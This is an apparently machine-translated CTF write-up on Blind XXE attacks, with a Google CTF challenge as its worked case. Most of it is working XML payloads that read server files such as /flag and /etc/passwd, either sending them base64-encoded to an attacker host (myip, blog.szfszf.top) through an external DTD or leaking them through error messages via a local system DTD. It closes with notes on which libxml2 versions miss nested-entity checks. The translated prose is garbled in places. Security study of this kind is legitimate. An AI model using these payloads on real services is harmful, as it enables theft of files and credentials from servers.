0x01 posted the source address
Blind XXE Detailed analysis of a question with Google CTF
0x02 posted common payload
A, Blind XXE
1, externalDTD
(1) to add the following in your server DTD
files
xml.dtd
<!ENTITY % start "<!ENTITY % send SYSTEM 'http://myip:10001/?%file;'>">
%start;
Then the data request is the following (with php
data encoding protocol is transmitted base64
)
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "http://myip/xml.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
%remote;
%send;
]>
<message>1234</message>
2, local DTD file
ubuntu
The system comes /usr/share/yelp/dtd/docbookx.dtd
in part
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "/usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % ISOamso '
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://myip/?%file;'>">
%eval;
%send;
'>
%remote;
]>
<message>1234</message>
Second, based on an error of Blind XXE
Based on the principles given and OOB
the like, OOB
through a url outer configuration data out of the tape, and is configured based on a false error url
and leaked contents of the file on url
the data returned by this way.
So and OOB
manner of construction almost only url
different, exactly the same elsewhere.
1, by introducing a server file
xml.dtd
<!ENTITY % start "<!ENTITY % send SYSTEM 'file:///hhhhhhh/%file;'>">
%start;
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "http://blog.szfszf.top/xml.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
%remote;
%send;
]>
<message>1234</message>
2, by introducing a local file
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % remote SYSTEM "/usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % ISOamso '
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'file://hhhhhhhh/?%file;'>">
%eval;
%send;
'>
%remote;
]>
<message>1234</message>
0x03 google CTF
First with burpsuite get caught
here found the problem, based on json
the web
application, and sometimes can also be sent xml
, we will json
change xml
, and then sendpayload
<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT message ANY>
<!ENTITY % remote SYSTEM "/usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % para1 SYSTEM "file:///flag">
<!ENTITY % ISOamso '
<!ENTITY % para2 "<!ENTITY &#x25; error SYSTEM 'file:///%para1;'>">
%para2;
'>
%remote;
]>
<message>10</message>
But I found that if I do not refer to external DTD files directly through the nesting parameter entities, This question can also do it.
<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT message ANY>
<!ENTITY % para1 SYSTEM "file:///flag">
<!ENTITY % para '
<!ENTITY % para2 "<!ENTITY &#x25; error SYSTEM 'file:///%para1;'>">
%para2;
'>
%para;
]>
<message>10</message
0x04 interesting discovery
I found that, although W3C
the agreement is not allowed in a parameter entity referenced in an internal entity declaration, but a lot of XML
the parser does not perform well this check. Almost all XML
parser found that the following two nested
<?xml version="1.0"?>
<!DOCTYPE message [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % start "<!ENTITY % send SYSTEM 'http://myip/?%file;'>">
%start;
%send;
]>
<message>10</message>
But for three nested parameter entity constructed payload Some XML parser can not be detected, such as my two combinations of this test php7.2 + libxml2 2.9.4
version and php5.4 + libxml2 2.9.1
are effectively utilized
<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT message ANY>
<!ENTITY % para1 SYSTEM "file:///flag">
<!ENTITY % para '
<!ENTITY % para2 "<!ENTITY &#x25; error SYSTEM 'file:///%para1;'>">
%para2;
'>
%para;
]>
<message>10</message>
This means that, without reference to an external dtd can be achieved Blind XXE
.